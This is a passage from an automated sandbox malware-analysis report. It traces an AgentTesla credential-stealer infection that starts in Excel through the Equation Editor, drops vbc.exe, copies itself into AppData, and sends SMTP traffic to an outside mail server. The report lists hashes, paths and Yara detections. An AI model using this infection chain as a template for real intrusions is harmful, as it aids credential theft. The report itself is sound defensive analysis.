                                                                    Jun 16, 2021 12:22:32.109935999 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
                                                                    Jun 16, 2021 12:22:32.955218077 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 250 OK id=1ltSgp-00FDYr-UE

                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior


                                                                    System Behavior

                                                                    General

                                                                    Start time:12:20:44
                                                                    Start date:16/06/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                    Imagebase:0x13f820000
                                                                    File size:27641504 bytes
                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:21:06
                                                                    Start date:16/06/2021
                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                    Imagebase:0x400000
                                                                    File size:543304 bytes
                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:21:09
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\Public\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                    Imagebase:0xad0000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:21:11
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\Public\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\Public\vbc.exe
                                                                    Imagebase:0xad0000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:21:41
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:21:42
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:21:49
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:21:52
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Disassembly

                                                                    Code Analysis
